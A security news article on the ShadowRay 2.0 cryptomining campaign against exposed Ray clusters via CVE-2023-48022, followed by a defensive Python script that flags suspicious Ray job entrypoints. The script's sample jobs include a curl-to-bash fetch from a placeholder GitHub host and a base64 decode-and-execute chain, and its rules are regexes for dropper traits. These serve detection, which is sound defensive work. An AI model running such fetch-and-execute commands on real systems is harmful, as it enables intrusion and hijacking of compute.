ShadowRay’s Cryptocurrency Takeover: Converting Ray Clusters into Mining Machines
ShadowRay 2.0: A Global Campaign Exploiting Ray Clusters for Crypto Mining
In a new global campaign known as ShadowRay 2.0, cybercriminals are targeting exposed Ray clusters to convert them into a self-propagating cryptomining botnet. The campaign exploits an old code execution flaw in the Ray open-source framework developed by Anyscale. Ray clusters, also referred to as head nodes, are used to build and scale AI and Python applications in a distributed computing ecosystem.
According to researchers at runtime security company Oligo, a threat actor named IronErn440 is utilizing AI-generated payloads to compromise vulnerable Ray infrastructure accessible through the public internet. This campaign follows a previous ShadowRay campaign exposed by Oligo between September 2023 and March 2024.
Exploiting Vulnerabilities and Payload Capabilities
The cybercriminals behind ShadowRay 2.0 are leveraging an old critical vulnerability, tracked as CVE-2023-48022, to infiltrate Ray clusters. The security issue has still not been addressed, yet the number of vulnerable Ray servers reachable from the internet has increased significantly.
Oligo researchers have observed two attack waves, one utilizing GitLab for payload delivery and another targeting GitHub. The payloads used in these attacks are generated with the assistance of large language models, as evidenced by the code structure and error handling patterns.
The malicious payloads submitted through Ray’s Jobs API execute multi-stage Bash and Python scripts, orchestrating the deployment of malware across all nodes in the cluster. The crypto-mining module, which mines for Monero, is AI-generated and designed to evade detection by utilizing only a portion of the available processing power.
Defense Strategies and Recommendations
Given the absence of a fix for CVE-2023-48022, Ray users are advised to follow best practices recommended by Anyscale when deploying their clusters. These practices include securing the clusters from unauthorized access using firewall rules and security group policies.
Anyscale has also emphasized the importance of deploying Ray in a secure, trusted environment. Additional security measures such as implementing authorization on the Ray Dashboard port and continuous monitoring of AI clusters for anomalous activity are recommended by Oligo to defend against ShadowRay 2.0.
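One concrete form the "continuous monitoring for anomalous activity" recommendation can take is reviewing what is being submitted through the Jobs API, since the article describes the payloads arriving as job entrypoints that run multi-stage Bash and Python scripts fetched from GitLab and GitHub. The script below is an added defender-side example, not code from Oligo, Anyscale or the Ray project: it applies generic heuristics to a constructed export of job submissions and flags entrypoints that fetch remote scripts into a shell, decode embedded payloads, or detach themselves into the background. The record layout and the sample entrypoints are assumptions made for the example; the patterns are illustrative and are not the campaign's indicators.

```python
"""Heuristic review of Ray Jobs API submissions (added defender example).

A Ray job carries an `entrypoint` shell command. This module scans a list of
job records and reports entrypoints whose shape resembles a multi-stage
dropper. The rules are generic; tune them to your own baseline of normal jobs.
"""
import re
from typing import Dict, List

# (label, regex). Each rule targets one dropper trait rather than a specific
# payload, so it keeps working when hosting URLs or file names change.
RULES = [
    ("remote_script_piped_to_shell",
     re.compile(r"\b(?:curl|wget)\b[^|;&]*\|\s*(?:ba|z|da)?sh\b")),
    ("remote_script_fed_to_python",
     re.compile(r"\b(?:curl|wget)\b[^|;&]*\|\s*python[0-9.]*\b")),
    ("base64_decode_then_execute",
     re.compile(r"base64\s+(?:-d|--decode)\b[^|;&]*\|\s*(?:(?:ba|z|da)?sh|python[0-9.]*)\b")),
    ("raw_code_hosting_fetch",  # the article names GitLab and GitHub as delivery channels
     re.compile(r"https?://(?:raw\.githubusercontent\.com|gist\.github\.com|gitlab\.com/\S*/-/raw/)", re.I)),
    ("inline_python_exec",
     re.compile(r"python[0-9.]*\s+-c\s+['\"].*\b(?:exec|eval)\s*\(", re.S)),
    ("background_detached",
     re.compile(r"\b(?:nohup|setsid|disown)\b")),
]


def analyze_entrypoint(entrypoint: str) -> List[str]:
    """Return the labels of every rule the entrypoint matches, in RULES order."""
    return [label for label, rx in RULES if rx.search(entrypoint)]


def scan_jobs(jobs: List[Dict[str, str]], min_hits: int = 1) -> Dict[str, List[str]]:
    """Map job_id -> matched labels for every job with at least `min_hits` matches.

    `min_hits` lets an operator raise the bar (e.g. require two traits) when a
    single pattern such as background_detached is common in legitimate jobs.
    """
    findings: Dict[str, List[str]] = {}
    for job in jobs:
        hits = analyze_entrypoint(job.get("entrypoint", ""))
        if len(hits) >= min_hits:
            findings[job["job_id"]] = hits
    return findings


# Constructed records for the example; the decoded strings are "echo hi" and "print(1)".
SAMPLE_JOBS = [
    {"job_id": "raysubmit_train01",
     "entrypoint": "python train.py --epochs 10 --data /mnt/data"},
    {"job_id": "raysubmit_etl02",
     "entrypoint": "python -m pipeline.run --config configs/etl.yaml"},
    {"job_id": "raysubmit_susp03",
     "entrypoint": "curl -fsSL https://raw.githubusercontent.com/example-org/example-repo/main/stage1.sh | bash"},
    {"job_id": "raysubmit_susp04",
     "entrypoint": "echo ZWNobyBoaQ== | base64 -d | sh; "
                   "nohup python3 -c 'import base64;exec(base64.b64decode(\"cHJpbnQoMSk=\"))' &"},
]


if __name__ == "__main__":
    for job_id, reasons in scan_jobs(SAMPLE_JOBS).items():
        print(f"{job_id}: {', '.join(reasons)}")
```

Run against a real export, the interesting output is not the two obviously hostile records but the long tail of jobs that trip one rule: those are the ones to compare against the team's known submission pipeline. Pair this with the network controls the article lists; a job review catches what has already reached the head node, while firewall and security group rules keep untrusted sources from reaching the Jobs API at all.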